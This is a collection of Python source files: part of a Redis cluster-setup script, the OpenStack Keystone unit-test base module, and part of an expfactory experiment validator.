        Returns (True, output) on success, or (False, None) on failure.
        """
        try:
            ip, port = seed.split(':')
            out = subprocess.check_output([self.command, '-p', str(self.port), 'cluster', 'meet', ip, port])
            return (True, out)
        except subprocess.CalledProcessError as e:
            print "ERR cluster meet {0}".format(e.output)
            return (False, None)
    def replicate(self, master_id):
        """Make this node a replica of `master_id` via CLUSTER REPLICATE.

        Returns (True, output) on success, or (False, None) on failure.
        """
        try:
            out = subprocess.check_output([self.command, '-p', str(self.port), 'cluster', 'replicate', master_id])
            return (True, out)
        except subprocess.CalledProcessError as e:
            print "ERR replicate {0}".format(e.output)
            return (False, None)
    def cluster_all_meet(self, seeds):
        """MEET every seed in the comma-separated `seeds` string.

        Each MEET is retried through wait(); returns the list of
        (success, output) results, one per seed.
        """
        seed_ar = seeds.split(',')
        print "Seeds: {0}".format(seed_ar)
        results = []
        for seed in seed_ar:
            results.append(self.wait(self.cluster_meet, [seed]))
        return results
def wait(self, command, args=()):
for t in range(0, 10):
success, out = command(*args)
if success:
return (success, out)
else:
print "Command: {0} with {1} failed, repeating {2}...".format(command, out, t)
time.sleep(3)
return (False, None)
def nodes_config(self):
try:
out = subprocess.check_output([self.command, '-p', str(self.port), 'cluster', 'nodes'])
return (True, parse_config(out))
except subprocess.CalledProcessError as e:
print "ERR nodes config {0}".format(e.output)
return (False, {})
def count_slaves(self, master_id, slaves):
return len([x for x in slaves if x['slaveof'] == master_id])
def choose_least_covered_master(self, masters, slaves):
masters_count = []
for i in range(0, len(masters)):
counter = self.count_slaves(masters[i]['id'], slaves)
masters_count.append(counter + 1)
# masters_count = [1, 1, 1, 1]
# masters_count = [1, 5, 6, 2]
# masters = [{'id':1}, {'id':2}, {'id':3}, {'id':4}]
N = sum(masters_count)
masters_universe = []
for i in range(0, len(masters)):
how_much_needed = N / masters_count[i]
for j in range(0, how_much_needed):
masters_universe.append(masters[i])
random.shuffle(masters_universe)
return random.choice(masters_universe)
# masters = [{'slaveof': '-', 'type': 'master', 'id': '74eacbf979e0c057aa7975f044e02ac3d9ea069d', 'address': '127.0.0.1:7002'}]
def add_slave(self, no_of_masters_needed, predecesors, current_config):
my_master = None
masters = []
slaves = []
for t in range(0, 300):
masters = [x for x in current_config['predecesors'] if 'master' in x['flags'] and len(x['slots']) > 0]
slaves = [x for x in current_config['predecesors'] if 'slave' in x['flags']]
if len(masters) >= no_of_masters_needed:
my_master = self.choose_least_covered_master(masters, slaves)
break
else:
success,current_config = cli.wait_for_config(predecesors)
print "Cannot choose master from {0}".format(masters)
time.sleep(3)
if my_master is None:
my_master = self.choose_least_covered_master(masters, slaves)
print "Adding slave as {0} for the guy {1}".format(current_config['myself'], my_master)
self.wait(self.replicate, [my_master['id']])
# myself = {'slaveof': '-', 'type': 'myself,master', 'id': 'b4f549ee553acd1f07eaf2a0815340c2ce6cea38', 'address': '127.0.0.1:7001'}
# no_of_masters_needed = 3
# masters = [{'slaveof': '-', 'type': 'master', 'id': '74eacbf979e0c057aa7975f044e02ac3d9ea069d', 'address': '127.0.0.1:7002'}]
def add_master(self, no_of_masters_needed, current_config):
myself = current_config['myself']
print "Adding master as {0}".format(myself)
my_id = myself['id']
my_index = myself['index']
counter_start = my_index * self.token_no
while(counter_start < self.max_slot):
self.apply_slots(my_id, counter_start, min(counter_start + self.token_no, self.max_slot))
counter_start += no_of_masters_needed * self.token_no
# range_start = 56
# range_end = 112
def apply_slots(self, my_id, range_start, range_end):
print "Applying slot {0}-{1} to id {2}".format(range_start, range_end, my_id)
for t in range(range_start, range_end):
self.apply_slot(my_id, t)
def set_slot(self, my_id, slot):
try:
cmd = [self.command, '-p', str(self.port), 'cluster', 'setslot', str(slot), 'node', my_id]
out = subprocess.check_output(cmd)
return (True, out)
except subprocess.CalledProcessError as e:
print "ERR set_slot {0}".format(e.output)
return (False, None)
def apply_slot(self, my_id, slot):
cli.wait(cli.set_slot, [my_id, slot])
# all_nodes = '10.133.5.67:9031,10.133.5.50:32900,10.133.5.37:9131,10.133.5.67:33821,10.133.5.60:9390,10.133.5.37:9362,10.133.5.68:9201,10.133.5.47:9288,10.133.5.67:9015'
# my_address = '10.133.5.67:33821'
# my_address = '10.133.5.37:9131'
# predecesors = find_my_predecesors(all_nodes, my_address)
# out = parse_config('3e3a6cb0d9a9a87168e266b0a0b24026c0aae3f0 10.133.5.67:9031 master - 0 1385482984082 0 connected 5960-10921\n2938205e12de373867bf38f1ca29d31d0ddb3e46 10.133.5.50:32900 master - 0 1385482983582 0 connected\n97a3a64667477371c4479320d683e4c8db5858b1 10.133.5.37:9131 myself,master - 0 0 0 connected 0-5959 10922-11422\n')
def wait_for_config(self, predecesors):
for t in range(0, 300):
success, out = cli.wait(cli.nodes_config)
d = defaultdict(dict)
for l in (predecesors, out):
for elem in l:
d[elem['address']].update(elem)
joined_config = d.values()
only_predecesors = [x for x in joined_config if 'index' in x]
myself = [x for x in out if 'myself' in x['flags']][0]
myself['index'] = len(predecesors)
all_predecesors_covered = reduce(operator.and_, ['id' in x and 'link_status' in x and x['link_status'] == 'connected' for x in only_predecesors], True)
if success and all_predecesors_covered:
return (success, {'predecesors': only_predecesors, 'myself': myself})
else:
print "Conditions not met {0}, {1}".format(success, only_predecesors)
time.sleep(3)
# all_nodes = '10.133.5.67:9031,10.133.5.50:32900,10.133.5.37:9131,10.133.5.67:33821,10.133.5.60:9390,10.133.5.37:9362,10.133.5.68:9201,10.133.5.47:9288,10.133.5.67:9015'
# my_address = '10.133.5.67:9031'
# my_address = '10.133.5.67:33821'
# my_address = '10.133.5.67:9015'
# my_address = '10:1'
def find_my_predecesors(all_nodes, my_address):
    """Return index/address records for every node listed before ours.

    :param all_nodes: comma-separated "host:port" list in launch order
    :param my_address: this node's "host:port" entry
    :returns: [] when my_address is absent, otherwise one
              {'index': i, 'address': addr} dict per predecessor
    """
    nodes = all_nodes.split(",")
    if my_address not in nodes:
        return []
    position = nodes.index(my_address)
    return [{'index': idx, 'address': addr}
            for idx, addr in enumerate(nodes[:position])]
def should_be_master(no_of_masters_needed, current_config):
    """Decide whether this node should claim a master role.

    Counts peers with a lower launch index that are already masters; if
    fewer than no_of_masters_needed exist, this node becomes one.

    :param no_of_masters_needed: target master count for the cluster
    :param current_config: dict with 'myself' and 'predecesors' entries
                           as produced by RedisClient.wait_for_config
    :returns: True when this node should become a master

    Fix: the py2-only print statements now use the parenthesized
    single-argument form, which is output-identical under Python 2 and
    valid under Python 3.
    """
    my_index = current_config['myself']['index']
    print('My index {0}'.format(my_index))
    peers = current_config['predecesors']
    counter = 0
    for peer in peers:
        print('Checking peer {0}'.format(peer))
        if peer['index'] < my_index and 'master' in peer['flags']:
            counter += 1
    print('Current no of masters {0} vs needed {1}'.format(counter, no_of_masters_needed))
    return counter < no_of_masters_needed
# seed_uri_conf_file = 'seed_uri_test.yml'
# redis_conf_file = 'redis-3.0.0-rc1/7001/redis.conf'
# my_port = 7001
if __name__ == "__main__":
    # Entry point: argv[1] names a YAML file providing my_address,
    # seeds (comma-separated), and the full launch-ordered node list.
    seed_uri_conf_file = sys.argv[1]
    with open(seed_uri_conf_file) as cf:
        # NOTE(review): yaml.load without an explicit Loader executes
        # arbitrary tags; fine for a trusted local config, unsafe otherwise.
        config = yaml.load(cf)
    my_address = config['my_address']
    # my_port stays a string; RedisClient str()s it for every CLI call.
    my_ip, my_port = my_address.split(":")
    seeds = config['seeds']
    all_nodes = config['all']
    print "Running cluster reconfiguration me {0}, ".format(my_address)
    cli = RedisClient(my_port)
    # Abort early if the local redis instance is not reachable.
    success,out = cli.wait(cli.ping)
    if not success:
        print "Cannot connect to Redis:{0} check your config".format(my_port)
        sys.exit(1)
    print "Connected: {0}:{1}".format(success, out)
    # One master is expected per seed node.
    no_of_masters_needed = len(seeds.split(','))
    all_meetings = cli.cluster_all_meet(seeds)
    # NOTE(review): relies on the Python-2 builtin reduce.
    all_succedded = reduce(operator.and_, [x[0] for x in all_meetings], True)
    if not all_succedded:
        print "Couldnt meet with some servers {0}".format(all_meetings)
        sys.exit(1)
    # Nodes launched before us decide whether we still need masters.
    predecesors = find_my_predecesors(all_nodes, my_address)
    success,current_config = cli.wait_for_config(predecesors)
    print "Current seen config: {0}".format(current_config)
    if (should_be_master(no_of_masters_needed, current_config)):
        cli.add_master(no_of_masters_needed, current_config)
    else:
        cli.add_slave(no_of_masters_needed, predecesors, current_config)
    print "End of configuring cluster"
| |
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
import atexit
import functools
import logging
import os
import re
import shutil
import socket
import sys
import warnings
import fixtures
from oslo_config import cfg
from oslo_config import fixture as config_fixture
from oslo_log import log
import oslotest.base as oslotest
from oslotest import mockpatch
import six
from sqlalchemy import exc
from testtools import testcase
import webob
# NOTE(ayoung)
# environment.use_eventlet must run before any of the code that will
# call the eventlet monkeypatching.
from keystone.common import environment # noqa
environment.use_eventlet()
from keystone import auth
from keystone.common import config as common_cfg
from keystone.common import dependency
from keystone.common import kvs
from keystone.common.kvs import core as kvs_core
from keystone.common import sql
from keystone import config
from keystone import controllers
from keystone import exception
from keystone import notifications
from keystone.policy.backends import rules
from keystone.server import common
from keystone import service
from keystone.tests.unit import ksfixtures
config.configure()
LOG = log.getLogger(__name__)
# Process id as text: used to namespace the per-run temp directory.
PID = six.text_type(os.getpid())
# Directory containing this file; everything else is derived from it.
TESTSDIR = os.path.dirname(os.path.abspath(__file__))
TESTCONF = os.path.join(TESTSDIR, 'config_files')
# Three directory levels up from the tests package -> repository root.
ROOTDIR = os.path.normpath(os.path.join(TESTSDIR, '..', '..', '..'))
VENDOR = os.path.join(ROOTDIR, 'vendor')
ETCDIR = os.path.join(ROOTDIR, 'etc')
def _calc_tmpdir():
    """Pick the per-process temp directory for this test run.

    Honors KEYSTONE_TEST_TEMP_DIR when set; otherwise falls back to a
    'tmp' subtree next to the tests, namespaced by PID either way.
    """
    base = os.environ.get('KEYSTONE_TEST_TEMP_DIR')
    if base:
        return os.path.join(base, PID)
    return os.path.join(TESTSDIR, 'tmp', PID)
TMPDIR = _calc_tmpdir()
CONF = cfg.CONF
log.register_options(CONF)
rules.init()
# In-memory SQLite used when tests need a throwaway database.
IN_MEM_DB_CONN_STRING = 'sqlite://'
# Make formatting errors inside exception messages fatal during tests.
exception._FATAL_EXCEPTION_FORMAT_ERRORS = True
# NOTE(review): raises if TMPDIR already exists; the PID-unique path
# makes that unlikely but not impossible (PID reuse).
os.makedirs(TMPDIR)
atexit.register(shutil.rmtree, TMPDIR)
class dirs(object):
    """Path helpers rooted at the well-known test-tree directories."""
    @staticmethod
    def root(*parts):
        return os.path.join(ROOTDIR, *parts)
    @staticmethod
    def etc(*parts):
        return os.path.join(ETCDIR, *parts)
    @staticmethod
    def tests(*parts):
        return os.path.join(TESTSDIR, *parts)
    @staticmethod
    def tmp(*parts):
        return os.path.join(TMPDIR, *parts)
    @staticmethod
    def tests_conf(*parts):
        return os.path.join(TESTCONF, *parts)
# keystone.common.sql.initialize() for testing.
# Default on-disk SQLite database path used by SQL-backed tests.
DEFAULT_TEST_DB_FILE = dirs.tmp('test.db')
@atexit.register
def remove_test_databases():
    """Delete the throwaway SQLite databases left over from a test run."""
    for name in ('test.db', 'test.db.pristine'):
        path = dirs.tmp(name)
        if os.path.exists(path):
            os.unlink(path)
def generate_paste_config(extension_name):
    """Write a copy of keystone-paste.ini with extension_name injected.

    The copy is named <extension_name>.ini, lives in the tmp dir, and
    adds the extension immediately before service_v3 in the pipeline.

    :returns: path of the generated paste file
    """
    with open(dirs.etc('keystone-paste.ini'), 'r') as src:
        template = src.read()
    patched = template.replace(' service_v3',
                               ' %s service_v3' % (extension_name))
    target = dirs.tmp(extension_name + '.ini')
    with open(target, 'w') as dst:
        dst.write(patched)
    return target
def remove_generated_paste_config(extension_name):
    """Delete the <extension_name>.ini produced by generate_paste_config."""
    os.remove(dirs.tmp(extension_name + '.ini'))
def skip_if_cache_disabled(*sections):
    """Skip the decorated test when caching is turned off.

    With no arguments only the global `enabled` option of the `cache`
    section is checked. Each named section additionally requires its own
    `caching` option to be true; a section that does not define the
    option is assumed to cache, matching `should_cache_fn` in
    keystone.common.cache.

    Usage::

        @skip_if_cache_is_disabled('assignment', 'token')
        def test_method(*args):
            ...
    """
    def wrapper(f):
        @functools.wraps(f)
        def inner(*args, **kwargs):
            if not CONF.cache.enabled:
                raise testcase.TestSkipped('Cache globally disabled.')
            for section in sections:
                section_conf = getattr(CONF, section, None)
                if section_conf is not None and not getattr(
                        section_conf, 'caching', True):
                    raise testcase.TestSkipped('%s caching disabled.' % section)
            return f(*args, **kwargs)
        return inner
    return wrapper
def skip_if_no_multiple_domains_support(f):
    """Skip the decorated test when the identity driver is single-domain only."""
    @functools.wraps(f)
    def wrapper(*args, **kwargs):
        test_instance = args[0]
        if not test_instance.identity_api.multiple_domains_supported:
            raise testcase.TestSkipped('No multiple domains support')
        return f(*args, **kwargs)
    return wrapper
class UnexpectedExit(Exception):
    """Raised in place of a real exit when code under test calls sys.exit().

    sys.exit is mockpatched to raise this in BaseTestCase.setUp.
    """
    pass
class BadLog(Exception):
    """Raised on invalid call to logging (parameter mismatch).

    logging.Handler.handleError is mockpatched to raise this in
    BaseTestCase.setUp so malformed log calls fail loudly in tests.
    """
    pass
class TestClient(object):
    """Minimal WSGI test client built on webob requests.

    When a token is configured it is injected as X-Auth-Token on every
    request unless the caller already supplied one.
    """
    def __init__(self, app=None, token=None):
        self.app = app
        self.token = token
    def request(self, method, path, headers=None, body=None):
        """Issue one request against self.app and return the response.

        NOTE: intentionally mutates a caller-supplied headers dict (the
        token is added via setdefault), preserving historic behavior.
        """
        if headers is None:
            headers = {}
        if self.token:
            headers.setdefault('X-Auth-Token', self.token)
        request = webob.Request.blank(path)
        request.method = method
        for name, value in six.iteritems(headers):
            request.headers[name] = value
        if body:
            request.body = body
        return request.get_response(self.app)
    def get(self, path, headers=None):
        return self.request('GET', path=path, headers=headers)
    def post(self, path, headers=None, body=None):
        return self.request('POST', path=path, headers=headers, body=body)
    def put(self, path, headers=None, body=None):
        return self.request('PUT', path=path, headers=headers, body=body)
class BaseTestCase(oslotest.BaseTestCase):
    """Light weight base test class.
    This is a placeholder that will eventually go away once the
    setup/teardown in TestCase is properly trimmed down to the bare
    essentials. This is really just a play to speed up the tests by
    eliminating unnecessary work.
    """
    def setUp(self):
        super(BaseTestCase, self).setUp()
        # Turn any sys.exit() in code under test into UnexpectedExit so
        # a stray exit fails the test instead of killing the runner.
        self.useFixture(mockpatch.PatchObject(sys, 'exit',
                                              side_effect=UnexpectedExit))
        # Logging parameter mismatches raise BadLog instead of being
        # swallowed by the handler's error hook.
        self.useFixture(mockpatch.PatchObject(logging.Handler, 'handleError',
                                              side_effect=BadLog))
        # Deprecation warnings from keystone modules are errors...
        warnings.filterwarnings('error', category=DeprecationWarning,
                                module='^keystone\\.')
        # ...and so are SQLAlchemy warnings.
        warnings.simplefilter('error', exc.SAWarning)
        self.addCleanup(warnings.resetwarnings)
    def cleanup_instance(self, *names):
        """Create a function suitable for use with self.addCleanup.
        :returns: a callable that uses a closure to delete instance attributes
        """
        def cleanup():
            for name in names:
                # TODO(dstanek): remove this 'if' statement once
                # load_backend in test_backend_ldap is only called once
                # per test
                if hasattr(self, name):
                    delattr(self, name)
        return cleanup
class TestCase(BaseTestCase):
    """Full-featured Keystone test base: config, fixtures, backend loading."""
    def config_files(self):
        # Hook: subclasses return extra config files for self.config().
        return []
    def config_overrides(self):
        # Baseline option overrides applied to every test; subclasses
        # extend this (see SQLDriverOverrides).
        signing_certfile = 'examples/pki/certs/signing_cert.pem'
        signing_keyfile = 'examples/pki/private/signing_key.pem'
        self.config_fixture.config(group='oslo_policy',
                                   policy_file=dirs.etc('policy.json'))
        self.config_fixture.config(
            # TODO(morganfainberg): Make Cache Testing a separate test case
            # in tempest, and move it out of the base unit tests.
            group='cache',
            backend='dogpile.cache.memory',
            enabled=True,
            proxies=['keystone.tests.unit.test_cache.CacheIsolatingProxy'])
        self.config_fixture.config(
            group='catalog',
            driver='templated',
            template_file=dirs.tests('default_catalog.templates'))
        self.config_fixture.config(
            group='kvs',
            backends=[
                ('keystone.tests.unit.test_kvs.'
                 'KVSBackendForcedKeyMangleFixture'),
                'keystone.tests.unit.test_kvs.KVSBackendFixture'])
        self.config_fixture.config(group='revoke', driver='kvs')
        self.config_fixture.config(
            group='signing', certfile=signing_certfile,
            keyfile=signing_keyfile,
            ca_certs='examples/pki/certs/cacert.pem')
        self.config_fixture.config(group='token', driver='kvs')
        self.config_fixture.config(
            group='saml', certfile=signing_certfile, keyfile=signing_keyfile)
        # Quiet the chattier libraries so test logs stay readable.
        self.config_fixture.config(
            default_log_levels=[
                'amqp=WARN',
                'amqplib=WARN',
                'boto=WARN',
                'qpid=WARN',
                'sqlalchemy=WARN',
                'suds=INFO',
                'oslo.messaging=INFO',
                'iso8601=WARN',
                'requests.packages.urllib3.connectionpool=WARN',
                'routes.middleware=INFO',
                'stevedore.extension=INFO',
                'keystone.notifications=INFO',
                'keystone.common._memcache_pool=INFO',
                'keystone.common.ldap=INFO',
            ])
        self.auth_plugin_config_override()
    def auth_plugin_config_override(self, methods=None, **method_classes):
        # Override the enabled auth methods and/or their plugin classes.
        if methods is not None:
            self.config_fixture.config(group='auth', methods=methods)
            common_cfg.setup_authentication()
        if method_classes:
            self.config_fixture.config(group='auth', **method_classes)
    def setUp(self):
        super(TestCase, self).setUp()
        self.addCleanup(CONF.reset)
        self.config_fixture = self.useFixture(config_fixture.Config(CONF))
        self.addCleanup(delattr, self, 'config_fixture')
        self.config(self.config_files())
        # NOTE(morganfainberg): mock the auth plugin setup to use the config
        # fixture which automatically unregisters options when performing
        # cleanup.
        def mocked_register_auth_plugin_opt(conf, opt):
            self.config_fixture.register_opt(opt, group='auth')
        self.useFixture(mockpatch.PatchObject(
            common_cfg, '_register_auth_plugin_opt',
            new=mocked_register_auth_plugin_opt))
        self.config_overrides()
        self.useFixture(fixtures.FakeLogger(level=logging.DEBUG))
        # NOTE(morganfainberg): This code is a copy from the oslo-incubator
        # log module. This is not in a function or otherwise available to use
        # without having a CONF object to setup logging. This should help to
        # reduce the log size by limiting what we log (similar to how Keystone
        # would run under mod_wsgi or eventlet).
        for pair in CONF.default_log_levels:
            mod, _sep, level_name = pair.partition('=')
            logger = logging.getLogger(mod)
            logger.setLevel(level_name)
        self.useFixture(ksfixtures.Cache())
        # Clear the registry of providers so that providers from previous
        # tests aren't used.
        self.addCleanup(dependency.reset)
        self.addCleanup(kvs.INMEMDB.clear)
        # Ensure Notification subscriptions and resource types are empty
        self.addCleanup(notifications.clear_subscribers)
        self.addCleanup(notifications.reset_notifier)
        # Reset the auth-plugin registry
        self.addCleanup(self.clear_auth_plugin_registry)
        self.addCleanup(setattr, controllers, '_VERSIONS', [])
    def config(self, config_files):
        # (Re)load CONF from the given config files; sql must be
        # initialized first so its options are registered.
        sql.initialize()
        CONF(args=[], project='keystone', default_config_files=config_files)
    def load_backends(self):
        """Initializes each manager and assigns them to an attribute."""
        # TODO(blk-u): Shouldn't need to clear the registry here, but some
        # tests call load_backends multiple times. These should be fixed to
        # only call load_backends once.
        dependency.reset()
        # TODO(morganfainberg): Shouldn't need to clear the registry here, but
        # some tests call load_backends multiple times. Since it is not
        # possible to re-configure a backend, we need to clear the list. This
        # should eventually be removed once testing has been cleaned up.
        kvs_core.KEY_VALUE_STORE_REGISTRY.clear()
        self.clear_auth_plugin_registry()
        drivers, _unused = common.setup_backends(
            load_extra_backends_fn=self.load_extra_backends)
        # Expose each manager as self.<manager_name> for test convenience.
        for manager_name, manager in six.iteritems(drivers):
            setattr(self, manager_name, manager)
        self.addCleanup(self.cleanup_instance(*list(drivers.keys())))
    def load_extra_backends(self):
        """Override to load managers that aren't loaded by default.
        This is useful to load managers initialized by extensions. No extra
        backends are loaded by default.
        :return: dict of name -> manager
        """
        return {}
    def load_fixtures(self, fixtures):
        """Hacky basic and naive fixture loading based on a python module.
        Expects that the various APIs into the various services are already
        defined on `self`.
        """
        # NOTE(dstanek): create a list of attribute names to be removed
        # from this instance during cleanup
        fixtures_to_cleanup = []
        # TODO(termie): doing something from json, probably based on Django's
        # loaddata will be much preferred.
        if (hasattr(self, 'identity_api') and
                hasattr(self, 'assignment_api') and
                hasattr(self, 'resource_api')):
            for domain in fixtures.DOMAINS:
                try:
                    rv = self.resource_api.create_domain(domain['id'], domain)
                except exception.Conflict:
                    rv = self.resource_api.get_domain(domain['id'])
                except exception.NotImplemented:
                    rv = domain
                attrname = 'domain_%s' % domain['id']
                setattr(self, attrname, rv)
                fixtures_to_cleanup.append(attrname)
            for tenant in fixtures.TENANTS:
                # Recreate the project fresh if a previous fixture load
                # already attached it to this instance.
                if hasattr(self, 'tenant_%s' % tenant['id']):
                    try:
                        # This will clear out any roles on the project as well
                        self.resource_api.delete_project(tenant['id'])
                    except exception.ProjectNotFound:
                        pass
                rv = self.resource_api.create_project(
                    tenant['id'], tenant)
                attrname = 'tenant_%s' % tenant['id']
                setattr(self, attrname, rv)
                fixtures_to_cleanup.append(attrname)
            for role in fixtures.ROLES:
                try:
                    rv = self.role_api.create_role(role['id'], role)
                except exception.Conflict:
                    rv = self.role_api.get_role(role['id'])
                attrname = 'role_%s' % role['id']
                setattr(self, attrname, rv)
                fixtures_to_cleanup.append(attrname)
            for user in fixtures.USERS:
                user_copy = user.copy()
                tenants = user_copy.pop('tenants')
                try:
                    existing_user = getattr(self, 'user_%s' % user['id'], None)
                    if existing_user is not None:
                        self.identity_api.delete_user(existing_user['id'])
                except exception.UserNotFound:
                    pass
                # For users, the manager layer will generate the ID
                user_copy = self.identity_api.create_user(user_copy)
                # Our tests expect that the password is still in the user
                # record so that they can reference it, so put it back into
                # the dict returned.
                user_copy['password'] = user['password']
                for tenant_id in tenants:
                    try:
                        self.assignment_api.add_user_to_project(
                            tenant_id, user_copy['id'])
                    except exception.Conflict:
                        pass
                # Use the ID from the fixture as the attribute name, so
                # that our tests can easily reference each user dict, while
                # the ID in the dict will be the real public ID.
                attrname = 'user_%s' % user['id']
                setattr(self, attrname, user_copy)
                fixtures_to_cleanup.append(attrname)
        self.addCleanup(self.cleanup_instance(*fixtures_to_cleanup))
    def _paste_config(self, config):
        # Resolve a bare name to a 'config:<path>-paste.ini' URI, trying
        # the tests dir first and then etc/; pass through explicit URIs.
        if not config.startswith('config:'):
            test_path = os.path.join(TESTSDIR, config)
            etc_path = os.path.join(ROOTDIR, 'etc', config)
            for path in [test_path, etc_path]:
                if os.path.exists('%s-paste.ini' % path):
                    return 'config:%s-paste.ini' % path
        return config
    def loadapp(self, config, name='main'):
        # Load the named WSGI app from the resolved paste config.
        return service.loadapp(self._paste_config(config), name=name)
    def clear_auth_plugin_registry(self):
        # Drop all registered auth methods so the next test re-loads them.
        auth.controllers.AUTH_METHODS.clear()
        auth.controllers.AUTH_PLUGINS_LOADED = False
    def assertCloseEnoughForGovernmentWork(self, a, b, delta=3):
        """Asserts that two datetimes are nearly equal within a small delta.
        :param delta: Maximum allowable time delta, defined in seconds.
        """
        msg = '%s != %s within %s delta' % (a, b, delta)
        self.assertTrue(abs(a - b).seconds <= delta, msg)
    def assertNotEmpty(self, l):
        # Passes for any container with a nonzero length.
        self.assertTrue(len(l))
    def assertRaisesRegexp(self, expected_exception, expected_regexp,
                           callable_obj, *args, **kwargs):
        """Asserts that the message in a raised exception matches a regexp.
        """
        try:
            callable_obj(*args, **kwargs)
        except expected_exception as exc_value:
            if isinstance(expected_regexp, six.string_types):
                expected_regexp = re.compile(expected_regexp)
            # NOTE(review): `unicode` is Python-2 only; this branch breaks
            # under Python 3.
            if isinstance(exc_value.args[0], unicode):
                if not expected_regexp.search(unicode(exc_value)):
                    raise self.failureException(
                        '"%s" does not match "%s"' %
                        (expected_regexp.pattern, unicode(exc_value)))
            else:
                if not expected_regexp.search(str(exc_value)):
                    raise self.failureException(
                        '"%s" does not match "%s"' %
                        (expected_regexp.pattern, str(exc_value)))
        else:
            # No exception was raised at all: fail with the type's name.
            if hasattr(expected_exception, '__name__'):
                excName = expected_exception.__name__
            else:
                excName = str(expected_exception)
            raise self.failureException("%s not raised" % excName)
    @property
    def ipv6_enabled(self):
        # True only when the platform compiles in IPv6 AND the loopback
        # address is actually bindable.
        if socket.has_ipv6:
            sock = None
            try:
                sock = socket.socket(socket.AF_INET6)
                # NOTE(Mouad): Try to bind to IPv6 loopback ip address.
                sock.bind(("::1", 0))
                return True
            except socket.error:
                pass
            finally:
                if sock:
                    sock.close()
        return False
    def skip_if_no_ipv6(self):
        # skipTest() raises itself, so the `raise` is never reached; kept
        # for historic parity.
        if not self.ipv6_enabled:
            raise self.skipTest("IPv6 is not enabled in the system")
    def skip_if_env_not_set(self, env_var):
        # Skip tests that need an opt-in environment variable.
        if not os.environ.get(env_var):
            self.skipTest('Env variable %s is not set.' % env_var)
class SQLDriverOverrides(object):
    """A mixin for consolidating sql-specific test overrides."""
    def config_overrides(self):
        super(SQLDriverOverrides, self).config_overrides()
        # SQL specific driver overrides: route every pluggable backend
        # to its SQL implementation, in the same order as before.
        for group in ('catalog', 'identity', 'policy',
                      'revoke', 'token', 'trust'):
            self.config_fixture.config(group=group, driver='sql')
| |
'''
experiment.py: part of expfactory package
Functions to work with javascript experiments
'''
from expfactory.utils import find_directories, remove_unicode_dict
from glob import glob
import filecmp
import numpy
import json
import re
import os
def get_validation_fields():
    '''Return the config.json validation schema as (field, level, type) tuples.

    field: the field name
    level: minimum requirement level
        0: not required, no warning
        1: required, invalid when missing
        2: not required, but warn when missing
    type: the expected variable type
    '''
    return [
        ("run", 1, list),
        ("name", 2, str),
        ("contributors", 0, str),
        ("time", 1, int),
        ("notes", 0, str),
        ("reference", 2, str),
        ("exp_id", 1, str),
        ("cognitive_atlas_task_id", 2, str),
        ("experiment_variables", 0, list),
        ("publish", 1, str),
        ("deployment_variables", 0, str),
        ("template", 1, str),
    ]
def notvalid(reason):
    '''Print a validation failure reason and return False (invalid).

    Fix: the py2-only `print reason` statement becomes the
    parenthesized single-argument form, which is output-identical under
    Python 2 and valid under Python 3.
    '''
    print(reason)
    return False
def dowarning(reason):
    '''Print a validation warning without failing validation.

    Fix: py2-only print statement replaced by the parenthesized
    single-argument form (identical output under Python 2).
    '''
    print(reason)
def get_valid_templates():
    '''Return the experiment template types expfactory can deploy.'''
    return ['jspsych', 'survey', 'phaser', 'custom']
def get_acceptable_values(package_name):
    '''Look up the deployment variable names allowed for a template type.

    :param package_name: "jspsych" or "survey"
    :raises KeyError: for any other template name
    '''
    acceptable = {
        "jspsych": ["display_element",
                    "on_finish",
                    "on_trial_start",
                    "on_trial_finish",
                    "on_data_update",
                    "show_progress_bar",
                    "max_load_time",
                    "skip_load_check",
                    "fullscreen",
                    "default_iti"],
        "survey": ["fullscreen"],
    }
    return acceptable[package_name]
def validate(experiment_folder=None,warning=True):
    '''validate
    :param experiment_folder: full path to experiment folder with config.json
    :param warning: issue a warning for empty fields with level 2 (warning)
    ..note::
        takes an experiment folder, and looks for validation based on:
        - config.json
        - files existing specified in config.json
    All fields should be defined, but for now we just care about run scripts
    '''
    # Default to the current working directory when no folder is given.
    if experiment_folder==None:
        experiment_folder=os.path.abspath(os.getcwd())
    try:
        meta = load_experiment(experiment_folder)
        if meta == False:
            return notvalid("%s is not an experiment." %(experiment_folder))
        experiment_name = os.path.basename(experiment_folder)
    # NOTE(review): bare except hides the real parse error; only the
    # generic "not loadable" message survives.
    except:
        return notvalid("%s: config.json is not loadable." %(experiment_folder))
    # config.json must hold exactly one experiment description.
    if len(meta)>1:
        return notvalid("%s: config.json has length > 1, not valid." %(experiment_folder))
    fields = get_validation_fields()
    valid_templates = get_valid_templates()
    for field,value,ftype in fields:
        # Field must be in the keys if required
        if field not in meta[0].keys() and value == 1:
            return notvalid("%s: config.json is missing required field %s" %(experiment_name,field))
        else:
            # NOTE(review): this warns for every level-2 field even when
            # the field IS present; presumably only missing fields were
            # meant to warn — confirm before changing.
            if value == 2:
                if warning == True:
                    dowarning("WARNING: config.json is missing field %s: %s" %(field,experiment_name))
        if field == "exp_id":
            # Tag must correspond with folder name
            if meta[0][field] != experiment_name:
                return notvalid("%s: exp_id parameter %s does not match folder name." %(experiment_name,meta[0][field]))
            # name cannot have special characters, only _ and letters/numbers
            if not re.match("^[a-z0-9_]*$", meta[0][field]):
                return notvalid("%s: exp_id parameter %s has invalid characters, only lowercase [a-z],[0-9], and _ allowed." %(experiment_name,meta[0][field]))
        # Check if experiment is production ready
        if field == "publish":
            if meta[0][field] == "False":
                return notvalid("%s: config.json specifies not production ready." %experiment_name)
        # Run must be a list of strings
        if field == "run":
            # Is it a list?
            if not isinstance(meta[0][field],ftype):
                return notvalid("%s: field %s must be %s" %(experiment_name,field,ftype))
            # Is an experiment.js defined
            # Is each script in the list a string?
            for script in meta[0][field]:
                # If we have a single file, is it in the experiment folder?
                if len(script.split("/")) == 1:
                    if not os.path.exists("%s/%s" %(experiment_folder,script)):
                        return notvalid("%s: %s is specified in config.json but missing." %(experiment_name,script))
                # Do we have an external script? It must be https
                if re.search("http",script) and not re.search("https",script):
                    return notvalid("%s: external script %s must be https." %(experiment_name,script))
        # Below is for required parameters
        if value == 1:
            if meta[0][field] == "":
                return notvalid("%s: config.json must be defined for field %s" %(experiment_name,field))
